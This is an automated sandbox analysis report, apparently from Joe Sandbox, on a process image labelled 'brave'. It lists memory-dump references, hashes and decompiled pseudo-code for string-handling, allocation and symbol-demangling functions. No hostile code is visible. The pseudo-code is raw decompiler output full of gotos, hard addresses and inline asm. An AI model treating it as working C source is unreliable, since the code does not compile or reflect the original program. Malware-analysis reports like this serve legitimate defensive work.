Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Temp$FileNamePath
String ID:
API String ID: 3285503233-0
Opcode ID: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction ID: 2224c6587fd47df60bf892e086e3ea5085d72dd579db0bf6e3adf85a50475631
Opcode Fuzzy Hash: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction Fuzzy Hash: 0931D0A260878080EB508A12F65476AA351FB85BF4F500231EEBC8BBD9DFBED0858700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6004000 Relevance: 2.5, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FF67FF6A6004000(void* __eax, void* __edi, void* __esp, void* __rax, void* __rcx) {
				char _v584;
				int _t9;
				void* _t12;
				void* _t26;
				signed long long _t27;
				void* _t36;
				void* _t37;

				r12d = 0;
				_t35 =  &_v584;
				0xa6021630();
				_t37 = __rax;
				goto 0xa600403f;
				asm("o16 nop [cs:eax+eax]");
				if (__eax == 0x2f) goto 0xa6004049;
				_t27 = _t26 + 1;
				if (__rax - _t27 < 0) goto 0xa600407c;
				_t9 =  *(__rcx + _t27 * 2) & 0x0000ffff;
				if (_t9 != 0x5c) goto 0xa6004030;
				memset(__edi, _t9, 0x41 << 0);
				0xa6021638();
				 *((short*)( &_v584 + _t27 * 2)) = 0;
				_t12 = E00007FF67FF6A6003CD0(_t36, _t35); // executed
				if (_t37 - _t27 + 1 >= 0) goto 0xa600403f;
				return _t12;
			}

0x7ff6a6004011
0x7ff6a6004017
0x7ff6a600401c
0x7ff6a6004021
0x7ff6a6004024
0x7ff6a6004026
0x7ff6a6004034
0x7ff6a6004036
0x7ff6a600403d
0x7ff6a600403f
0x7ff6a6004047
0x7ff6a6004059
0x7ff6a600405f
0x7ff6a6004069
0x7ff6a6004072
0x7ff6a600407a
0x7ff6a600408b

APIs

wcslen.MSVCRT ref: 00007FF6A600401C
wcscpy.MSVCRT ref: 00007FF6A600405F

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: wcscpywcslen
String ID:
API String ID: 225642448-0
Opcode ID: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
Instruction ID: d2346ce12c8c7cbe1d7bcd64efbc2e70cb843a168f1eae3d213584a1fe452e32
Opcode Fuzzy Hash: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
Instruction Fuzzy Hash: 0BF07802F0F09684EA605E25A9003F71254BF14FD4F880532EF4C912D1EC7EA2D2C204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6006121 Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00007FF67FF6A6006121(void* __ebx, void* __edx, signed char __rax, void* __rbx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t150;
				signed int _t153;
				void* _t157;
				signed int _t158;
				signed int _t169;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t197;
				signed int _t200;
				signed int _t203;
				void* _t214;
				void* _t240;
				signed char* _t245;
				long long* _t249;
				long long* _t252;
				intOrPtr* _t255;
				intOrPtr* _t258;
				intOrPtr* _t261;
				intOrPtr* _t264;
				char* _t265;
				signed char* _t266;
				intOrPtr* _t269;
				intOrPtr* _t272;
				signed char* _t275;
				intOrPtr* _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t282;
				intOrPtr* _t321;
				intOrPtr* _t325;
				signed char* _t326;
				signed char* _t327;
				long long _t336;
				void* _t343;

				_t150 =  *(__rbx + 0x28);
				if (_t150 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326bc;
				_t321 = (_t150 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t321 + 4)) = 0;
				 *(__rbx + 0x28) = _t150 + 1;
				_a40 = _t321;
				 *_t321 = 0x2c;
				_t153 = ( *(__r8 + 2) & 0x000000ff) - 0x30;
				_t214 = _t153 - 9;
				 *((short*)(_t321 + 0x18)) = (_t153 & 0xffffff00 | _t214 < 0x00000000) & 0x000000ff;
				if (_t214 > 0) goto 0xa6006174;
				E00007FF67FF6A6004E90(__rax, __rbx, __rdx, __r8, _t343);
				E00007FF67FF6A6005BC0();
				_a40[0x10] = __rax;
				if (_a40[0x10] == 0) goto 0xa6005c20;
				_t157 = E00007FF67FF6A6004E90(_a40, __rbx, __rdx, __r8, _t343);
				_t245 =  *(__rbx + 0x18);
				if (( *_t245 & 0x000000ff) == 0) goto 0xa60061ae;
				_t305 =  &(_t245[1]);
				 *(__rbx + 0x18) =  &(_t245[1]);
				_a40[0x1a] = ( *_t245 & 0 | ( *_t245 & 0x000000ff) == 0x00000073) & 0x000000ff;
				_t180 =  *(__rbx + 0x28);
				if (_t180 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t249 = (_t180 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t180 + 1;
				 *_t249 = 0;
				 *((intOrPtr*)(_t249 + 8)) = 0;
				 *((long long*)(_t249 + 0x10)) = "decltype(auto)";
				 *((intOrPtr*)(_t249 + 0x18)) = 0xe;
				_t182 =  *(__rbx + 0x28);
				if (_t182 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t252 = (_t182 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t182 + 1;
				 *_t252 = 0;
				 *((intOrPtr*)(_t252 + 8)) = 0;
				 *((long long*)(_t252 + 0x10)) = 0xa62b3a36;
				 *((intOrPtr*)(_t252 + 0x18)) = 4;
				_t184 =  *(__rbx + 0x28);
				if (_t184 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326c9;
				_t255 = (_t184 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t255 + 4)) = 0;
				 *(__rbx + 0x28) = _t184 + 1;
				 *_t255 = 0x27;
				 *((long long*)(_t255 + 0x10)) = 0xa62b5380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t186 =  *(__rbx + 0x28);
				if (_t186 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326dc;
				_t258 = (_t186 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t258 + 4)) = 0;
				 *(__rbx + 0x28) = _t186 + 1;
				 *_t258 = 0x27;
				 *((long long*)(_t258 + 0x10)) = 0xa62b5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t188 =  *(__rbx + 0x28);
				if (_t188 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326a9;
				_t261 = (_t188 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t261 + 4)) = 0;
				 *(__rbx + 0x28) = _t188 + 1;
				 *_t261 = 0x27;
				 *((long long*)(_t261 + 0x10)) = 0xa62b53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t190 =  *(__rbx + 0x28);
				if (_t190 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032702;
				_t264 = (_t190 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t264 + 4)) = 0;
				 *(__rbx + 0x28) = _t190 + 1;
				 *_t264 = 0x27;
				 *((long long*)(_t264 + 0x10)) = 0xa62b5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0xa6005c22;
				 *_t264 =  *_t264 + _t157;
				_t158 =  *(__rbx + 0x28);
				if (_t158 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t325 = (_t158 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t325 + 4)) = 0;
				 *(__rbx + 0x28) = _t158 + 1;
				 *_t325 = 0x42;
				 *((intOrPtr*)(_t325 + 0x10)) = E00007FF67FF6A6004E90(_t264, __rbx, _t305, __r8, _t343);
				_t265 =  *(__rbx + 0x18);
				if ( *_t265 != 0x5f) goto 0xa6005c20;
				_t266 = _t265 + 1;
				 *(__rbx + 0x18) = _t266;
				E00007FF67FF6A6005BC0();
				E00007FF67FF6A6004DD0();
				_a40 = _t266;
				_t193 =  *(__rbx + 0x28);
				if (_t193 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t269 = (_t193 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t269 + 4)) = 0;
				 *(__rbx + 0x28) = _t193 + 1;
				 *_t269 = 0x27;
				 *((long long*)(_t269 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t195 =  *(__rbx + 0x28);
				if (_t195 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t272 = (_t195 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t272 + 4)) = 0;
				 *(__rbx + 0x28) = _t195 + 1;
				 *_t272 = 0x27;
				 *((long long*)(_t272 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t197 =  *(__rbx + 0x28);
				if (_t197 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t275 = (_t197 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t275 + 4)) = 0;
				 *(__rbx + 0x28) = _t197 + 1;
				 *_t275 = 0x27;
				 *((long long*)(_t275 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t275;
				_t200 =  *(__rbx + 0x28);
				if (_t200 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t278 = (_t200 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t278 + 4)) = 0;
				 *(__rbx + 0x28) = _t200 + 1;
				 *_t278 = 0x27;
				 *((long long*)(_t278 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t278, __rbx);
				_a40 = _t278;
				if (_t278 == 0) goto 0xa6005c20;
				if ( *_t278 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t279 = _t278 + 1;
				 *(__rbx + 0x18) = _t279;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t279;
				_t326 = _t279;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t326[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t326;
				_t281 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t336 = _a40;
				if (_t336 == 0) goto 0xa6005c20;
				_t203 =  *(__rbx + 0x38);
				if (_t203 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t203 * 8)) = _t336;
				 *(__rbx + 0x38) = _t203 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t281;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t336 + 3;
				E00007FF67FF6A6007F20(_t281, __rbx);
				_t327 = _t281;
				if (_t281 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t327);
				_push(__rbx);
				_t282 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t282[1]);
				r10d =  *_t282 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t169 = (r8d >> 0x1f) + r8d >> 1;
				_t240 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t169 + _t169 * 2) * 8)))) - r10b;
				if (_t240 == 0) goto 0xa6006680;
				if (_t240 <= 0) goto 0xa60066c0;
				r8d = _t169;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a6006121
0x7ff6a6006127
0x7ff6a6006137
0x7ff6a600613b
0x7ff6a6006143
0x7ff6a6006146
0x7ff6a600614b
0x7ff6a6006156
0x7ff6a6006159
0x7ff6a6006161
0x7ff6a6006165
0x7ff6a600616a
0x7ff6a6006177
0x7ff6a600617c
0x7ff6a600618a
0x7ff6a6006193
0x7ff6a6006198
0x7ff6a60061a1
0x7ff6a60061a3
0x7ff6a60061a7
0x7ff6a60061bc
0x7ff6a60061c5
0x7ff6a60061cb
0x7ff6a60061e2
0x7ff6a60061e6
0x7ff6a60061e9
0x7ff6a60061f0
0x7ff6a60061f7
0x7ff6a60061fb
0x7ff6a6006207
0x7ff6a600620d
0x7ff6a6006224
0x7ff6a6006228
0x7ff6a600622b
0x7ff6a6006232
0x7ff6a6006239
0x7ff6a600623d
0x7ff6a6006249
0x7ff6a600624f
0x7ff6a6006266
0x7ff6a600626a
0x7ff6a6006272
0x7ff6a6006275
0x7ff6a600627b
0x7ff6a600627f
0x7ff6a6006288
0x7ff6a600628e
0x7ff6a60062a5
0x7ff6a60062a9
0x7ff6a60062b1
0x7ff6a60062b4
0x7ff6a60062ba
0x7ff6a60062be
0x7ff6a60062c7
0x7ff6a60062cd
0x7ff6a60062e4
0x7ff6a60062e8
0x7ff6a60062f0
0x7ff6a60062f3
0x7ff6a60062f9
0x7ff6a60062fd
0x7ff6a6006306
0x7ff6a600630c
0x7ff6a6006323
0x7ff6a6006327
0x7ff6a600632f
0x7ff6a6006332
0x7ff6a6006338
0x7ff6a600633c
0x7ff6a6006340
0x7ff6a600634e
0x7ff6a6006350
0x7ff6a6006356
0x7ff6a6006369
0x7ff6a600636d
0x7ff6a6006375
0x7ff6a6006378
0x7ff6a6006383
0x7ff6a6006386
0x7ff6a600638d
0x7ff6a6006393
0x7ff6a600639a
0x7ff6a600639e
0x7ff6a60063b1
0x7ff6a60063b6
0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction ID: 15253391379e8bec5e31dfd4c1e22737e3842b3d8d3171a3a3ba7bb53b8bbc96
Opcode Fuzzy Hash: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction Fuzzy Hash: 4C317933A0AB0185E3208F15F9913A977A0EB94B98F184535D6CC873A5DF7ED6D0C384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6005CC8 Relevance: 1.3, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6005CC8(void* __edx, void* __rbx, void* __r8, long long _a40) {
				void* _t19;
				signed int _t20;
				signed int _t25;
				long long _t35;
				long long _t43;

				_t20 =  *(__rbx + 0x28);
				_t43 = (__edx - 0x61 << 5) + 0xa62b4fe0;
				if (_t20 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032696;
				_t35 = (_t20 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t35 + 4)) = 0;
				 *(__rbx + 0x28) = _t20 + 1;
				 *((long long*)(_t35 + 0x10)) = _t43;
				 *_t35 = 0x27;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) +  *((intOrPtr*)(_t43 + 8));
				 *((long long*)(__rbx + 0x18)) = __r8 + 1;
				_t19 = E00007FF67FF6A6006EE0(_t35, __rbx);
				_a40 = _t35;
				if (_t35 == 0) goto 0xa6005c20;
				_t25 =  *(__rbx + 0x38);
				if (_t25 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t25 * 8)) = _t35;
				 *(__rbx + 0x38) = _t25 + 1;
				return _t19;
			}

0x7ff6a6005cd2
0x7ff6a6005cdd
0x7ff6a6005ce3
0x7ff6a6005cf7
0x7ff6a6005cfb
0x7ff6a6005d03
0x7ff6a6005d06
0x7ff6a6005d0d
0x7ff6a6005d13
0x7ff6a6005d16
0x7ff6a6005d23
0x7ff6a6005d28
0x7ff6a6005d33
0x7ff6a6005d39
0x7ff6a6005d3f
0x7ff6a6005d4f
0x7ff6a6005d58
0x7ff6a6005d65

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction ID: b9fb1eb8d9501982a3bd533eb33c364dccc41abb24869337619c52ced3286e9a
Opcode Fuzzy Hash: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction Fuzzy Hash: 0B317672A0AB0586E720CF08F99536973A0FB94B99F148625C6CC473A8DF7ED190C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6001670 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6A600172F

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction ID: 82ff9db0f1110306c87cf3b2f9a2da2c1122d8dccae97a47cfe773ca573ecd9f
Opcode Fuzzy Hash: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction Fuzzy Hash: A3213E1291E7C186EB224B78E5013F97FA0AB9AB44F494270DFCD46386EF2ED584C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60063C0 Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00007FF67FF6A60063C0(void* __rbx, signed char* _a40) {
				signed int _t77;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				signed int _t88;
				signed int _t91;
				void* _t113;
				intOrPtr* _t118;
				intOrPtr* _t121;
				signed char* _t124;
				intOrPtr* _t127;
				signed char* _t128;
				signed char* _t130;
				signed char* _t131;
				signed char* _t154;
				signed char* _t155;
				long long _t162;

				_t81 =  *(__rbx + 0x28);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t118 = (_t81 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t118 + 4)) = 0;
				 *(__rbx + 0x28) = _t81 + 1;
				 *_t118 = 0x27;
				 *((long long*)(_t118 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t83 =  *(__rbx + 0x28);
				if (_t83 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t121 = (_t83 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t121 + 4)) = 0;
				 *(__rbx + 0x28) = _t83 + 1;
				 *_t121 = 0x27;
				 *((long long*)(_t121 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t85 =  *(__rbx + 0x28);
				if (_t85 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t124 = (_t85 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t124 + 4)) = 0;
				 *(__rbx + 0x28) = _t85 + 1;
				 *_t124 = 0x27;
				 *((long long*)(_t124 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t124;
				_t88 =  *(__rbx + 0x28);
				if (_t88 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t127 = (_t88 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t127 + 4)) = 0;
				 *(__rbx + 0x28) = _t88 + 1;
				 *_t127 = 0x27;
				 *((long long*)(_t127 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t127, __rbx);
				_a40 = _t127;
				if (_t127 == 0) goto 0xa6005c20;
